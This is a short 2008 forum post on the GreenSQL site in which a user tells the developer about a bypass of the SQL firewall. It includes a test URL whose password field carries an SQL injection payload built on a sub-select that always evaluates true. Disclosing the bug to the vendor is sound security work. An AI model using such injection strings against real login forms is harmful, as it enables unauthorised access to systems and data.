Bypass of SQL by sub select | GreenSQL

Bypass of SQL by sub select

No replies

Sun, 02/10/2008 - 12:32

RotemB

RotemB's picture

Joined: 02/10/2008

Hi Yuli,
I found a nice bug in the firewall

This is the url for the exploit.
http://www.greensql.net/sql-injection-test?
sql_user=aaaa&sql_pass=aa')%20or%20((select%20'1')='1

Rotem Bar